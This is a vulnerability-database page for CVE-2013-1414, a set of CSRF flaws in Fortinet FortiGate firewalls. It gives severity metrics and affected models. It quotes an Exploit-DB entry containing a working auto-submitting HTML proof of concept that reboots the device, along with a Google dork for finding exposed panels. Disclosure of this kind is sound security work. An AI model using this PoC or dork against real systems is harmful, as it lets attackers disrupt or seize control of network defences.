CVE-2013-1414 : Detail

CVE-2013-1414

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.34%V3
Network
2013-07-08
17h00 +00:00
2024-09-16
20h16 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 26528

Publication date : 2013-06-30 22h00 +00:00
Author : Sven Wurth
EDB Verified : No

Vulnerability ID: CVE-2013-1414 Vulnerability Type: CSRF (Cross-Site Request Forgery) Product: All Fortigate Firewalls Vendor: Fortinet http://www.fortinet.com Vulnerable Version: < 4.3.13 & < 5.0.2 Description ========== Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. Requirements =========== An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. Report-Timeline: ================ Vendor Notification: 11 July 2012 Vendor released version 5.0.2 / 18 March 2013 Vendor released version 4.3.13 / 29 April 2013 Status: Fixed Google Dork: ========== -english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser" Credit: ===== Sven Wurth [email protected] PoC ==== This Example will reboot a Fortinet Firewall. This is just one of many possibilities to attack this vulnerability. ##### CSRF - Proof Of Concept #### <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post"> <input type="hidden" name="reason" value=""> <input type="hidden" name="action" value="1"> <input type="submit" name="add" value="rebootme"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> ##### End Poc #####

Products Mentioned

Configuraton 0

Fortinet>>Fortios >> Version To (including) 4.3.12

Fortinet>>Fortios >> Version 4.3.10

Fortinet>>Fortios >> Version 5.0

Fortinet>>Fortios >> Version 5.0.1

Fortinet>>Fortigate-1000c >> Version -

Fortinet>>Fortigate-100d >> Version -

Fortinet>>Fortigate-110c >> Version -

Fortinet>>Fortigate-1240b >> Version -

Fortinet>>Fortigate-200b >> Version -

Fortinet>>Fortigate-20c >> Version -

Fortinet>>Fortigate-300c >> Version -

Fortinet>>Fortigate-3040b >> Version -

Fortinet>>Fortigate-310b >> Version -

Fortinet>>Fortigate-311b >> Version -

Fortinet>>Fortigate-3140b >> Version -

Fortinet>>Fortigate-3240c >> Version -

Fortinet>>Fortigate-3810a >> Version -

Fortinet>>Fortigate-3950b >> Version -

Fortinet>>Fortigate-40c >> Version -

Fortinet>>Fortigate-5001a-sw >> Version -

Fortinet>>Fortigate-5001b >> Version -

Fortinet>>Fortigate-5020 >> Version -

Fortinet>>Fortigate-5060 >> Version -

Fortinet>>Fortigate-50b >> Version -

Fortinet>>Fortigate-5101c >> Version -

Fortinet>>Fortigate-5140b >> Version -

Fortinet>>Fortigate-600c >> Version -

Fortinet>>Fortigate-60c >> Version -

Fortinet>>Fortigate-620b >> Version -

Fortinet>>Fortigate-800c >> Version -

Fortinet>>Fortigate-80c >> Version -

Fortinet>>Fortigate-voice-80c >> Version -

Fortinet>>Fortigaterugged-100c >> Version -

References

http://www.exploit-db.com/exploits/26528/
Tags : exploit, x_refsource_EXPLOIT-DB